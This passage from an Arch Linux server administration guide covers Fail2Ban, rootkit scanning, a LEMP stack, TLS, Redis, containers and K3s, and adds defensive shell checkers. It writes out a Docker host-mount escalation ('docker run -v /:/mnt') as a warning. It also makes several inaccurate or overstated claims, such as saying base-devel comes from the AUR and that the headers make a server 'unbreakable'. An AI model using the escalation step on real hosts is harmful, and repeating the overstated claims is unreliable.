sudo nano /etc/fail2ban/filter.d/nextcloud.conf
Add:
[Definition]
failregex = ^.*Login failed: .* \(Remote IP: '<HOST>'\).*$
ignoreregex =
Then, you activate "the jail" by adding it to the local jails file:
sudo nano /etc/fail2ban/jail.local
[nextcloud]
enabled = true
port = http,https
filter = nextcloud
logpath = /var/log/nextcloud/nextcloud.log
maxretry = 3
# Three failures and you're blocked for 24 hours (86400 seconds).
bantime = 86400
Restart the daemon (sudo systemctl restart fail2ban). Now you have a security guardian that continuously patrols the logs, choking entire botnets at the kernel's network layer.
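Before trusting a hand-written failregex it should be run against real log lines; Fail2Ban ships fail2ban-regex for exactly that. The shell functions below are an added example (not part of the book or of Fail2Ban) that do a simplified offline version of the same dry run: they substitute Fail2Ban's <HOST> placeholder with an IPv4 pattern, extract the offending address from each matching line, and list the addresses that reach maxretry. The log lines are constructed (Nextcloud writes one JSON object per line, and the message field is what the regex looks at), the function names are mine, and findtime, which the real jail also applies, is ignored.

```shell
#!/bin/sh
# Added example: dry-run the Nextcloud failregex above against constructed log lines.
# Function names are my own; fail2ban-regex is the project's own equivalent tool.

FAILREGEX="^.*Login failed: .* \(Remote IP: '<HOST>'\).*\$"
HOST_RE='(([0-9]{1,3}\.){3}[0-9]{1,3})'

# Constructed sample of /var/log/nextcloud/nextcloud.log (JSON, one event per line)
NC_LOG=$(mktemp)
cat > "$NC_LOG" <<'EOF'
{"reqId":"a1","level":2,"app":"core","message":"Login failed: 'admin' (Remote IP: '203.0.113.7')"}
{"reqId":"a2","level":2,"app":"core","message":"Login failed: 'root' (Remote IP: '203.0.113.7')"}
{"reqId":"a3","level":1,"app":"files","message":"Scanned 12 files"}
{"reqId":"a4","level":2,"app":"core","message":"Login failed: 'alice' (Remote IP: '198.51.100.5')"}
{"reqId":"a5","level":2,"app":"core","message":"Login failed: 'admin1' (Remote IP: '203.0.113.7')"}
{"reqId":"a6","level":2,"app":"core","message":"Login failed: 'test' (Remote IP: '203.0.113.7')"}
EOF

# f2b_ere: the failregex as a POSIX ERE with <HOST> replaced by a capturing
# IPv4 group (group 1), built with parameter expansion so no sed escaping is needed.
f2b_ere() {
  printf '%s' "${FAILREGEX%%<HOST>*}${HOST_RE}${FAILREGEX#*<HOST>}"
}

# f2b_hosts LOGFILE: print the <HOST> of every line the failregex matches.
f2b_hosts() {
  sed -nE "s/$(f2b_ere)/\1/p" "$1"
}

# f2b_match_count LOGFILE: how many lines matched (0 means the regex is wrong).
f2b_match_count() {
  f2b_hosts "$1" | wc -l | tr -d ' '
}

# f2b_offenders LOGFILE MAXRETRY: addresses with at least MAXRETRY failures,
# i.e. the ones the jail would ban (ignoring findtime).
f2b_offenders() {
  f2b_hosts "$1" | sort | uniq -c | awk -v max="$2" '$1 >= max { print $2 }'
}

echo "matched lines: $(f2b_match_count "$NC_LOG")"
echo "would ban: $(f2b_offenders "$NC_LOG" 3)"
```

A match count of 0 against your real log is the signal that the regex and the log format disagree (a changed message wording, a different quoting style) and the jail would silently protect nothing; check that before enabling it.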
13.6.2 Post-Breach Audit: Rootkit Search
Despite AppArmor and LUKS, we must remain humble in the face of state-sponsored actors or CPU zero-day vulnerabilities (such as Spectre or Meltdown). If a breach has occurred, the attacker will install a "rootkit": a set of code that modifies your own operating system's standard tools (ls, ps) to make itself invisible. If a rootkit is installed, when you run htop to see the processes, that htop has been maliciously reprogrammed not to display the malware.
The cure is external, independent auditors: rkhunter (Rootkit Hunter) and chkrootkit.
sudo pacman -S rkhunter chkrootkit
As a sanity precaution for an Arch Linux server, you can schedule a systemd timer (Chapter 10) to run these tools in the early morning hours:
sudo rkhunter --check
The tool will download a database of cryptographic signatures and analyze whether the binaries in your /usr/bin/ match the ones pacman originally installed, or whether they have been overwritten by an attacker.
With this arsenal of U2F physical keys, reactive network cages, and immutable binary auditors, you have turned your Arch Linux server into a paranoid, high-availability fortress, capable of sustaining its sovereignty in the hostile core of the Internet.
Chapter 14: Web Server Architecture (Complete LEMP Stack) ↑ Home
Since Arch Linux always has the latest binary packages (e.g., the latest PHP 8.x and Nginx 1.25+ builds), setting up a web server environment on it results in one of the fastest platforms available. Many administrators avoid Arch in production due to concerns about the rolling release model, but if you bypass the graphical environment packages and manage your server headless (console-only), its stability and agility are formidable for a knowledgeable sysadmin.
We are going to deploy a LEMP architecture (Linux, Nginx, MariaDB, PHP), the standard that replaced the old LAMP (which used Apache).
14.1 Nginx: The Reverse Proxy and Asynchronous Web Server ↑ Home
While Apache (the standard during the 2000s) created a new RAM-consuming process/thread for each user who visited your website (limiting the number of visits your PC could handle), Nginx (pronounced Engine-X) was designed by the Russian Igor Sysoev with an asynchronous (event-driven) architecture. A single Nginx process can handle more than 10,000 simultaneous connections using almost no extra RAM, and it works exceptionally well as a reverse proxy (when placed in front of a Node.js or Python server).
14.1.1 Installation and Initial Optimization
sudo pacman -S nginxBefore even starting the service, we'll adjust the main engine. Open the Nginx configuration:
sudo nano /etc/nginx/nginx.confIn the first lines, the behavior of the "Workers" changes. worker_processes 1; by:
worker_processes auto;
worker_rlimit_nofile 100000;(This tells Nginx to deploy as many workers as you have available CPU cores, and raises the limit of files that the Linux kernel allows you to keep open simultaneously.)
In the section events:
events {
worker_connections 4096;
multi_accept on;
}(Multi-accept allows the worker to accept all new connections at once, massively reducing latency when your server experiences a spike in traffic - "Slashdot effect").
Enable and start the beast:
sudo systemctl enable --now nginx.service(Firewall Note: If you followed Chapter 13 of UFW, you should run sudo ufw allow 80/tcp and sudo ufw allow 443/tcp).
14.2 Relational Engines (MariaDB) and Storage
The relational database engine is the heart of your application's state (where users, passwords, and items are stored). Oracle bought MySQL and partially shut it down; the original creator forked his own code and called it MariaDB, guaranteeing that it would always be open source. In Arch, they are 100% interchangeable, command for command.
14.2.1 Cluster Initialization in Arch
A critical technical detail: installing the MariaDB package on Arch Linux does NOT create the on-disk scaffolding where the InnoDB tables and the system's B-trees live. This is intentional, for security reasons (on Ubuntu, it is done silently in a deb post-install script).
- Install the engine:
sudo pacman -S mariadb
- Initialize the data cluster, owned by the mysql user:
sudo mariadb-install-db --user=mysql --basedir=/usr --datadir=/var/lib/mysql
- Start the daemon:
sudo systemctl enable --now mariadb.service
14.2.2 Database Hardening
A freshly installed database server is a ticking time bomb (any anonymous user can log in). MariaDB ships a script to close these holes. Run:
sudo mariadb-secure-installation
- Root password (MariaDB): it will ask whether you want to configure unix_socket authentication. On Arch this is highly recommended, because it stops anyone from logging in to the database as root unless they are already the root system user of the Linux machine.
- Answer "Y" (Yes) to remove anonymous users.
- Answer "Y" to disable remote login for the root user.
- Answer "Y" to remove the test database.
- Answer "Y" to reload the privilege tables.
14.3 The Server Process Manager: PHP-FPM
Nginx, thanks to its hyper-efficient design, does not include a code interpreter (it doesn't understand PHP, Python, or Ruby). It is purely an HTTP server and dispatcher of static files (images, CSS). To run a dynamic website (like WordPress), we need a processor that runs alongside it. For PHP, the standard is the FastCGI Process Manager (PHP-FPM).
14.3.1 Installation and UNIX Sockets
sudo pacman -S php php-fpm
PHP-FPM and Nginx need to talk to each other extremely fast (thousands of times per second). They could exchange internal network packets (TCP to 127.0.0.1:9000), but on the same physical machine that wastes resources in the kernel's TCP/IP stack. The professional solution is a UNIX socket, a file on disk (usually /run/php-fpm/php-fpm.sock) that acts as a direct tunnel between the two processes.
Enable the PHP-FPM service:
sudo systemctl enable --now php-fpm.service
14.3.2 Routing Nginx to PHP
Open the Nginx "server block" (virtual host) configuration in /etc/nginx/nginx.conf and find the block that begins with server { listen 80; ... }.
Modify it to catch every request ending in .php and hand it to the php-fpm UNIX socket:
server {
    listen 80;
    server_name mi-sitio-web.com www.mi-sitio-web.com;
    root /usr/share/nginx/html;
    index index.php index.html;
    location / {
        # If the file does not physically exist, send the request to the router (index.php)
        try_files $uri $uri/ /index.php?$args;
    }
    # FastCGI block
    location ~ \.php$ {
        # Intercepts PHP files
        fastcgi_pass unix:/run/php-fpm/php-fpm.sock;
        fastcgi_index index.php;
        include fastcgi.conf;
    }
    # Extra security block
    location ~ /\.ht {
        deny all;
    }
}
Create a test file at /usr/share/nginx/html/info.php containing <?php phpinfo(); ?>, reload Nginx (sudo systemctl restart nginx.service) and visit your IP in the browser. Delete info.php once you have confirmed PHP works, since phpinfo() reveals your full server configuration to anyone who requests it.
14.4 SSL/TLS Cryptography: EFF Certbot
Hosting a website over plain HTTP (port 80) in the 21st century is unacceptable; all data (including your WordPress users' passwords) travels in plain text across the network of undersea cables, and modern browsers (Chrome/Firefox) will penalize your SEO or outright block access to your site with a red warning screen ("Your connection is not private"). SSL/TLS certificates (the padlock in the address bar) used to cost hundreds of dollars a year. Today, the Electronic Frontier Foundation (EFF) manages Let's Encrypt, which offers free, strong, automated certificates.
14.4.1 Certbot's Total Automation
For this to work, your Arch server needs a real domain (e.g. www.tu-web.com) pointing to your public IP from your domain registrar (Cloudflare, Namecheap), and ports 80 and 443 open on your home router or VPS firewall.
Install the EFF command-line tool (Certbot) and its plugin for talking to Nginx:
sudo pacman -S certbot certbot-nginx
The deployment is brutally simple:
sudo certbot --nginx
The Certbot script will do the following:
- Read your /etc/nginx/nginx.conf looking for server_name directives.
- Spin up a mini web server to solve an HTTP-01 challenge against the Let's Encrypt servers, proving that you control the server the domain points to.
- Download your certificate (.pem) and private key.
- The magic: automatically edit your nginx.conf, closing the port 80 block with a 301 redirect to port 443 (HTTPS) and injecting the paths of your SSL certificate files.
- Reload Nginx gracefully, without interrupting visitors.
14.4.2 Automated Renewal (Systemd Timer)
Let's Encrypt certificates expire after exactly 90 days, to limit the damage if a key is stolen. To avoid an SSH login every three months, the Arch package already ships a timer (certbot.timer) that checks the certificates twice a day and renews any with less than 30 days left before expiry.
sudo systemctl enable --now certbot.timer
You've built a complete, enterprise-grade stack that's secure, hyperfast, asynchronous, and fully self-renewing. Your infrastructure is ready to host anything you can imagine.
14.5 RAM Cache Storage (Redis)
If you have a WordPress blog receiving 1,000 visits per hour, your MariaDB database has to read the articles from the drive (SSD) and recompute the SQL queries 1,000 times. That overloads your CPU. The industry solution for high-traffic sites isn't to tune MariaDB harder but to place a hyper-fast in-RAM key-value store (KVS) in front of it. The undisputed king here is Redis.
Redis keeps the most frequently requested data in RAM. RAM is 100 times faster than an NVMe SSD. If the page exists in Redis, it is served to the user in microseconds, bypassing MariaDB entirely.
14.5.1 Installation and Kernel Tuning for Redis
sudo pacman -S redis
Redis is extremely demanding about how the Linux kernel manages memory. If you start Redis without adjusting the kernel, it logs warnings telling you its performance is crippled.
The first problem is solved in sysctl (/etc/sysctl.d/99-redis.conf):
# Redis needs permission to overcommit memory
vm.overcommit_memory = 1
The second problem is Transparent HugePages (THP): Redis needs dynamic THP disabled to avoid latency spikes when memory is purged. THP is not a sysctl key; if you enabled THP in Chapter 11, add an exception for the Redis service through a systemd drop-in (sudo systemctl edit redis.service). The redirect needs a shell, because systemd does not interpret >, and the + prefix runs the command as root even though the service itself runs as the redis user:
[Service]
ExecStartPre=+/bin/sh -c 'echo never > /sys/kernel/mm/transparent_hugepage/enabled'
Enable and start Redis:
sudo systemctl enable --now redis.service
14.5.2 Integration (Object Cache)
If you use PHP, install the communication module:
sudo pacman -S php-redis
In your web application (e.g., WordPress), install an Object Cache plugin and point it at 127.0.0.1:6379 (the default Redis port). From that point on, your website's load times drop from 800 ms to 40 ms.
Redis also needs an eviction policy. If you have 2 GB of RAM allocated to Redis and it fills up, what happens? Edit /etc/redis/redis.conf and set:
maxmemory 2gb
maxmemory-policy allkeys-lru
(LRU = Least Recently Used. Redis evicts the data that hasn't been touched for the longest, keeping the cache fresh and preventing the server from running out of memory.)
14.6 Advanced Reverse Proxy and Load Balancing
As we saw in Chapter 14.1, Nginx can route requests to PHP-FPM, but its real corporate power lies in acting as a reverse proxy. Imagine you have a Node.js application on port 3000, a Python API (FastAPI) on port 8000, and three Docker containers running database servers. You don't want to expose all those ports to the world. You want Nginx to intercept everything on port 443 (HTTPS) and distribute the traffic logically.
14.6.1 Proxy Pass Configuration
Open the server block configuration (/etc/nginx/nginx.conf):
server {
    listen 443 ssl http2;
    server_name api.mi-sitio-web.com;
    # Certificates managed by Certbot (Chapter 14.4)
    ssl_certificate /etc/letsencrypt/live/api.mi-sitio-web.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/api.mi-sitio-web.com/privkey.pem;
    location / {
        proxy_pass http://127.0.0.1:3000;
        # These headers are CRITICAL. Without them, the Node.js app will think the visit
        # comes from the server itself (127.0.0.1) instead of the real IP of the Internet user.
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
    }
}
14.6.2 Load Balancing
If your Node.js application on port 3000 becomes overloaded, you can run three copies of it on ports 3001, 3002, and 3003. Nginx distributes the traffic among the three (round-robin algorithm) so your server handles three times the load.
Add the upstream block OUTSIDE the server block:
upstream mi_app_node {
    server 127.0.0.1:3001;
    server 127.0.0.1:3002;
    server 127.0.0.1:3003;
}
Then, instead of routing to a fixed address, route to the group:
proxy_pass http://mi_app_node;
14.6.3 Military-Grade Security Headers
A misconfigured web server invites cross-site scripting (XSS) and iframe hijacking attacks. In Nginx, always inject these headers into your main server block:
# HSTS: forces browsers to remember that your site ONLY works over HTTPS.
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
# Prevents other sites from embedding your page inside theirs (anti-clickjacking).
add_header X-Frame-Options "SAMEORIGIN";
# Stops browsers from guessing the file type, mitigating hidden-script attacks.
add_header X-Content-Type-Options "nosniff";
With these additions, your LEMP infrastructure (Linux, Nginx, MariaDB, PHP/Node/Redis) will pass any modern bank security audit or pentesting stress test, turning your Arch machine into an unbreakable web production bunker.
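Adding the headers is only half the job; you should confirm they actually reach the browser. Here is an added example (not from the book): a small shell checker that reads an HTTP response header block and reports whether the three headers above are present and sane. The response texts are constructed samples; on a real server you would feed it the output of curl -sI https://your-domain/. It assumes the usual "Name: value" header formatting.

```shell
# header_value HEADERS NAME: print the value of header NAME (case-insensitive name match)
header_value() {
    printf '%s\n' "$1" | tr -d '\r' \
        | awk -F': ' -v n="$2" 'tolower($1) == tolower(n) { print $2; exit }'
}

# check_security_headers HEADERS: print MISSING:/WEAK: findings; returns 0 only if all pass
check_security_headers() {
    headers="$1"; problems=""

    hsts=$(header_value "$headers" "Strict-Transport-Security")
    if [ -z "$hsts" ]; then
        problems="$problems MISSING:Strict-Transport-Security"
    else
        # a max-age below one year (31536000 s) gives browsers too little memory to be useful
        age=$(printf '%s' "$hsts" | sed -n 's/.*max-age=\([0-9][0-9]*\).*/\1/p')
        [ "${age:-0}" -ge 31536000 ] \
            || problems="$problems WEAK:Strict-Transport-Security(max-age=$age)"
    fi

    xfo=$(header_value "$headers" "X-Frame-Options")
    case "$(printf '%s' "$xfo" | tr 'a-z' 'A-Z')" in
        DENY|SAMEORIGIN) ;;
        *) problems="$problems MISSING:X-Frame-Options" ;;
    esac

    xcto=$(header_value "$headers" "X-Content-Type-Options")
    [ "$(printf '%s' "$xcto" | tr 'A-Z' 'a-z')" = "nosniff" ] \
        || problems="$problems MISSING:X-Content-Type-Options"

    [ -n "$problems" ] && printf '%s\n' "$problems"
    [ -z "$problems" ]
}

# Constructed sample responses (not captured from a real server)
GOOD_RESPONSE='HTTP/1.1 200 OK
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Type: text/html'

BAD_RESPONSE='HTTP/1.1 200 OK
Server: nginx
Strict-Transport-Security: max-age=300
Content-Type: text/html'

check_security_headers "$GOOD_RESPONSE" && echo "good response: all headers present"
check_security_headers "$BAD_RESPONSE" || echo "bad response: findings above"
```

One Nginx detail worth checking this way: add_header directives are inherited from the server block only if the location block contains no add_header of its own, so a location that adds any header silently drops the ones set above it unless you repeat them there.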
Chapter 15: Virtualization, Passthrough, and Containers
Modern computing is the science of deceiving the hardware. We trick an operating system into believing it owns a physical machine (virtualization), or we trick an application into believing it is the sole occupant of memory (containers). As an Arch power user, you rarely compile code on your host system, for fear of cluttering your precious installation with thousands of orphaned dependencies. For risky testing, web deployments, or wild builds, you use isolated environments.
15.1 The Era of the Type 1 Hypervisor: KVM and libvirt
There are Type 2 hypervisors, such as VirtualBox or VMware Player. These run as a normal program (like a web browser) in user space, which adds a massive layer of latency to every disk and CPU instruction they must interpret.
On Linux, we use a Type 1 hypervisor called KVM (Kernel-based Virtual Machine). Because it is embedded in the kernel itself, KVM turns Arch Linux into a bare-metal hypervisor with only a 2% performance degradation. We use QEMU to emulate motherboards, networks, and peripherals, and the libvirt API to orchestrate that chaos.
15.1.1 Installing the Virtualization Ecosystem
sudo pacman -S qemu-desktop libvirt edk2-ovmf virt-manager dnsmasq
- edk2-ovmf: the open-source UEFI firmware. Without it, your virtual machines could not use GPT disks and would be stuck emulating machines from 2005.
- virt-manager: a GTK graphical tool that abstracts away libvirt's painful XML, giving you a "VirtualBox on steroids" experience.
Add your user to the libvirt group, to avoid typing passwords every two minutes, and start the central daemon:
sudo usermod -aG libvirt francesc
sudo systemctl enable --now libvirtd.service
15.1.2 VFIO PCI Passthrough (The Holy Grail of VM Gaming)
(Advanced theory) One of KVM's most impressive technical feats is PCI Passthrough. If you have two graphics cards in your desktop PC (for example, an integrated Intel GPU and a discrete NVIDIA RTX card), you can bind the NVIDIA card through your motherboard's IOMMU group and hand it physically to your Windows 11 virtual machine. The result: Arch Linux running on the integrated graphics on monitor 1, and a Windows VM on monitor 2 using the official NVIDIA Windows drivers at 99% native gaming performance. Windows 11 has no way of knowing it is virtualized and believes it is the rightful owner of the RTX silicon. (This process requires modifying the kernel's IOMMU boot parameters and complex VFIO isolation.)
15.2 Container Architecture: Docker
Virtual machines (VMs) emulate the motherboard, install their own kernel (e.g., 2 GB of Windows), boot from their own hard drive, and so on. They consume a lot of RAM and take 30 seconds to boot. Containers are a technology exclusive to the Linux kernel. They use cgroups (control groups for CPU/RAM) and namespaces (network and user isolation) to fool the process. A container running a web server (Nginx) and a database (PostgreSQL) shares the EXACT SAME KERNEL as your Arch Linux. The container weighs only 30 megabytes (it contains no operating system, only system binaries and libraries), boots in 0.2 seconds (the kernel is already running), and uses as much RAM as a normal process. It is alien-level engineering.
15.2.1 The Docker Ecosystem and the Daemon
sudo pacman -S docker docker-compose
Docker uses a client-server architecture. The client is the terminal command, but the server is a huge process (dockerd) that runs as root in the background to orchestrate the network and storage magic.
sudo systemctl enable --now docker.service
sudo usermod -aG docker francesc
(Log out and back in. IMPORTANT: on Linux, being in the docker group is technically equivalent to having unrestricted root privileges. A malicious user could create a container and mount the whole disk (/dev/nvme) inside it.)
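Because membership in docker, libvirt or (later in this chapter) incus-admin hands a normal user control of a root-run daemon, it is worth auditing who is in those groups. Here is an added example (not the book's code) that lists the members of such groups from /etc/group-format text. The group list and the sample file are assumptions constructed for the demo; on a real host call privileged_members "$(cat /etc/group)".

```shell
# Groups whose membership is treated as privileged (assumed list; extend as needed)
SENSITIVE_GROUPS="docker libvirt incus-admin"

# privileged_members GROUP_FILE_TEXT: print "group:user" for every member of a sensitive group
privileged_members() {
    printf '%s\n' "$1" | awk -F: -v groups="$SENSITIVE_GROUPS" '
        BEGIN { n = split(groups, g, " "); for (i = 1; i <= n; i++) want[g[i]] = 1 }
        # /etc/group fields: name:password:gid:member1,member2,...
        ($1 in want) && $4 != "" {
            m = split($4, users, ",")
            for (i = 1; i <= m; i++) print $1 ":" users[i]
        }'
}

# count_privileged GROUP_FILE_TEXT: number of (group, user) pairs, for a quick health check
count_privileged() {
    privileged_members "$1" | wc -l | tr -d ' '
}

# Constructed sample, not a real /etc/group
SAMPLE_GROUP='root:x:0:
wheel:x:998:francesc
docker:x:968:francesc,ci-runner
libvirt:x:965:francesc
incus-admin:x:962:
users:x:100:francesc,guest'

echo "privileged group memberships in the sample:"
privileged_members "$SAMPLE_GROUP"
echo "total: $(count_privileged "$SAMPLE_GROUP")"
```

A service account such as ci-runner in the docker group deserves the same scrutiny as a sudoer: anything that can run docker run -v /:/mnt can read and modify the host's disk.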
15.2.2 Images, Containers and Compositions
In Docker, the read-only template is called an Image, which you download from a global repository (Docker Hub). When you tell Docker to "run" that image, Docker clones the template and creates a volatile writable layer on top of it, called a Container.
A quick command to run a clean Ubuntu inside your Arch Linux without installing Ubuntu:
docker run -it ubuntu /bin/bash
The real infrastructure (Docker Compose): in a real development environment we don't use long, one-off commands. We describe the infrastructure in a declarative YAML file and let the computer run it. For example, if you need to test the new version of Ghost CMS (a WordPress competitor) and don't want to clutter your system with stray Node.js or MariaDB packages, create a docker-compose.yml file in an empty folder:
version: '3.1'
services:
  ghost:
    image: ghost:latest
    ports:
      - "8080:2368" # Maps your local port 8080 to port 2368 inside the container
    environment:
      database__client: mysql
      database__connection__host: db
      database__connection__user: root
      database__connection__password: contraseña_secreta
      database__connection__database: ghost
  db:
    image: mysql:8.0
    environment:
      MYSQL_ROOT_PASSWORD: contraseña_secreta
(The password here is a placeholder for a throwaway test; for anything you keep, move it out of the file into a .env file next to docker-compose.yml, which Compose reads for variable substitution, so the secret never lands in version control.)
Run it from the folder:
docker-compose up -d
In about 5 seconds, Docker downloads both images, creates an isolated virtual network, starts MySQL, waits for it to respond, starts the CMS, and maps your port. Open localhost:8080 in your browser and your complex web server is live. When you're finished, run docker-compose down and the system, databases, and configuration evaporate into thin air, leaving your Arch Linux completely pristine.
15.3 Safe Evolution: Podman (Daemonless and Rootless)
Red Hat identified three severe weaknesses in the Docker architecture (and replaced Docker in OpenShift, its enterprise Kubernetes orchestrator):
- Daemon dependency (SPOF, single point of failure): if the dockerd process (the central server) freezes or crashes, ALL your thousands of containers go down with it, taking the server out.
- Root security: the daemon must always run as superuser, which opens a huge range of exploits (escapes from the container to the host machine).
- Not systemd-friendly: because it does not interact well with the init system, making containers start natively when the machine boots is complicated.
The answer is Podman. Podman has no central server (daemonless). More importantly, Podman lets your standard user (francesc) run, download, and build complex containers entirely in normal user space without ANY superuser permissions (rootless containers). If malware breaks out of a Podman container, it only finds standard user permissions.
15.3.1 Installation and Migration
sudo pacman -S podman podman-compose
The transition from Docker to Podman is designed to be seamless; the engineers cloned the exact same commands. In fact, the official manual suggests a trick in your shell config (~/.bashrc):
alias docker=podman
alias docker-compose=podman-compose
Once these are in place, your old automation scripts that call docker run ... will quietly invoke Podman instead.
Podman also has the superpower of exporting a container's state into systemd's native language (.service units), letting you plug your infrastructure directly into the operating system's boot sequence with no third-party daemon in the way, for absolute stability of the Arch Linux system you built.
15.4 Lightweight Virtualization (LXC / LXD)
While Docker and Podman (Chapter 15.2) follow the "one process per container" philosophy (one container just for Nginx, another just for the database), there is another paradigm: system containers.
Linux Containers (LXC) and its far more advanced manager LXD/Incus let you create containers that behave exactly like virtual machines (their own systemd, their own boot process, cron jobs, multiple applications) while using your underlying Arch Linux kernel. There is no CPU emulation (KVM) and no hypervisor.
15.4.1 Initializing the Incus Ecosystem
LXD was maintained by Canonical (Ubuntu), but after a license change that closed it off, the Linux community forked it as Incus, which is the current standard adopted by Arch Linux.
sudo pacman -S incus
sudo systemctl enable --now incus.service
You must add your user to the incus-admin group and configure the daemon by answering its interactive questions (allocate a ZFS or Btrfs storage pool, and create a virtual network bridge):
sudo usermod -aG incus-admin francesc
sudo incus admin init
15.4.2 Launching Complete Systems
To launch a container with Alpine Linux, Debian, or even another copy of Arch Linux inside your host in under a second:
incus launch images:archlinux/current maquina-arch-2
To log in as root on that machine (which has its own internal IP, its own firewall, and its own daemons):
incus exec maquina-arch-2 -- bash
This is the architecture hosting companies (VPS providers) use to rent you cheap "dedicated servers": they are renting you an LXC container that, from the inside, is indistinguishable from a physical machine.
15.5 Large-Scale Orchestration: Kubernetes (K3s)
When you have 100 Docker containers spread across 5 physical servers, Docker Compose falls short. If Server 1 physically fails, Docker has no way to automatically restart the lost containers on Server 2.
Kubernetes (K8s) is the undisputed standard for cloud orchestration (invented by Google). It is an operational intelligence system that keeps your applications in their desired state regardless of hardware chaos. Installing pure Kubernetes ("K8s The Hard Way") would take a whole book, but Rancher Labs created K3s, a certified, hyper-lightweight distribution that strips out legacy code, perfect for a single Arch Linux node or a Raspberry Pi cluster.
15.5.1 Installing K3s (Master Node)
K3s uses containerd (Docker's underlying engine) and ships as a single binary. On Arch, it can be installed from the AUR:
yay -S k3s-bin
Enable the service as a server node (master/control plane):
sudo systemctl enable --now k3s.service
To use the client tool (kubectl) without being root, copy the cluster's credentials file:
mkdir ~/.kube
sudo cp /etc/rancher/k3s/k3s.yaml ~/.kube/config
sudo chown francesc:francesc ~/.kube/config
15.5.2 K8s Concepts: Pods and Ingress
With K3s up and running, you no longer talk to individual containers. You talk in "declarations": you send a YAML file to the master server.
A classic K8s despliegue.yaml file:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: mi-web-escalable
spec:
  replicas: 3 # Magic! K8s will bring up 3 copies and keep them alive
  selector:
    matchLabels:
      app: web
  template:
    metadata:
      labels:
        app: web
    spec:
      containers:
      - name: nginx-contenedor
        image: nginx:latest
        ports:
        - containerPort: 80
Apply the infrastructure:
kubectl apply -f despliegue.yaml
You will see 3 "Pods" (capsules containing your containers) appear. If you run kubectl delete pod <name> to emulate a catastrophic failure, you will see the K3s orchestrator notice within a second that a replica is missing and start a new container to compensate automatically.
K3s also bundles Traefik, an Ingress controller (an intelligent router that does the same reverse-proxy work as Nginx in Chapter 14, but dynamically and automatically as containers are born and die).
With Kubernetes running on your local machine, your Arch Linux computer becomes a cloud-native development platform. You write code, package it into a container, and deploy it to your local Kubernetes, confident that when you push it to massive clusters on Amazon AWS or Google Cloud it will behave exactly the same.
Chapter 16: The Art of Software Development (The Developer's Arch)
You've climbed a massive technical mountain. Installing and hardening Arch Linux is a learning process few professionals undertake, and if you've completed it, you have a hyper-agile system at your command. Arch Linux is, without a doubt, the perfect machine for software engineers, programmers, and data scientists.
On a user-friendly distribution like Ubuntu, if you need Node.js v20.x or the C++20 compiler, you depend on third-party PPA repositories maintained by dubious Launchpad accounts. On Arch, everything lands in your repositories as soon as the upstream code matures. In this chapter, we'll set up our environments to program safely without corrupting the underlying system.
16.1 The Philosophy of Isolated Environments (Logical Sandboxing)
The first rule of development on a rolling release system: never install libraries or global language dependencies with external managers such as pip (Python), npm (Node), or cargo (Rust) under sudo. If you do, that manager (pip, for example) will overwrite files under /usr/lib/ without pacman knowing. Months later, pacman will try to install something there and break the system with an unresolvable conflict error. Always use environment managers instead.
16.1.1 Python Ecosystem (venv and PEP 668)
Python is tightly bound to Arch Linux itself (many native tools and AUR helpers use it). If you try sudo pip install requests, Arch will reject it with a red PEP 668 alert informing you that the environment is "externally managed" (by pacman).
To program safely in Python:
- Install pip and virtualenv:
sudo pacman -S python-pip python-virtualenv
- Create the microclimate for your project. When starting a project, give it its own environment contained locally in the project folder:
mkdir mi_proyecto_backend && cd mi_proyecto_backend
python -m venv .venv
- Activate the environment (source it):
source .venv/bin/activate
Your prompt will change. From now on, everything you install (e.g. pip install Django) is trapped inside the hidden .venv folder and ignored by the rest of the system.
16.1.2 JavaScript/TypeScript Ecosystem (NVM and Node)
Frontend development changes incredibly fast. Many legacy projects you collaborate on will require older versions (e.g., Node.js v14 for a legacy project, Node.js v22 for your modern app). Installing the static nodejs package from pacman will ruin your life by limiting you to a single version.
The enterprise standard is Node Version Manager (NVM). Being an external script, it lives in the AUR.
yay -S nvm
You must source the NVM environment at the start of your interactive shell (for example in ~/.bashrc or ~/.zshrc):
echo 'source /usr/share/nvm/init-nvm.sh' >> ~/.bashrc
source ~/.bashrc
Now you control which version runs:
- Download the latest LTS version recommended for production:
nvm install --lts
- Download the old version 16:
nvm install 16
- Switch versions instantly:
nvm use 16
- All global npm installs (e.g. npm install -g yarn) are safely isolated inside a local hidden folder (~/.nvm/).
16.1.3 C/C++ Ecosystem and Rust (The Trendy Language)
Rust is fundamental because a huge number of native Arch tools are being rewritten in Rust (even parts of the modern Linux kernel). Just as NVM manages Node, Rust has rustup.
sudo pacman -S rustup
rustup default stable
(This downloads and initializes the rustc compiler binaries and the superb dependency manager cargo in the ~/.cargo/ folder.)
To program in C/C++, you should already have the essential package for compiling things from the AUR, which gives you the glorious GCC compiler and Make; here we add the debugging tools:
# You already have these if you followed the guide; we add the debugging tools.
sudo pacman -S base-devel gdb clang cmake
Clang and CMake are the winning pair for compiling C++ instantly in modern IDEs.
16.2 Version Control: Git at the SysAdmin Level
You're a programmer. You need Git as much as you need oxygen.
sudo pacman -S git
Asymmetric authentication (goodbye web tokens): cloning private repositories from GitHub/GitLab over HTTPS means typing cumbersome personal access tokens that expire. The hacker approach is to use the SSH key you generated in Chapter 13. On the GitHub website go to Settings -> SSH and GPG keys -> New SSH Key, and paste the public half of the key you generated in the terminal:
cat ~/.ssh/id_ed25519.pub
Now you can clone code without passwords using the repositories' SSH URLs:
git clone git@github.com:torvalds/linux.git
Improvements (aliases in the .gitconfig dotfile): Git's configuration lives in your home directory. Use these commands to colour the interface and make the log command draw an ASCII graph of the version tree:
git config --global user.name "Tu Apellido"
git config --global user.email "developer@empresa.com"
git config --global color.ui auto
git config --global init.defaultBranch main
git config --global core.editor "nano"
# The super-alias for visualizing branches:
git config --global alias.tree "log --graph --decorate --pretty=oneline --abbrev-commit"
Now, when you type git tree, you'll see the entire branched repository history in glorious colour.
16.3 Integrated Development Environments (IDEs and Editors)
A master carpenter respects his tools. Choosing an editor on Linux (and Arch) is almost a religion. There are two dominant philosophies: broad usability through a graphical interface (VS Code) and the relentless minimalism of the keyboard-driven terminal (Neovim).
16.3.1 Visual Studio Code: Beware of Telemetry
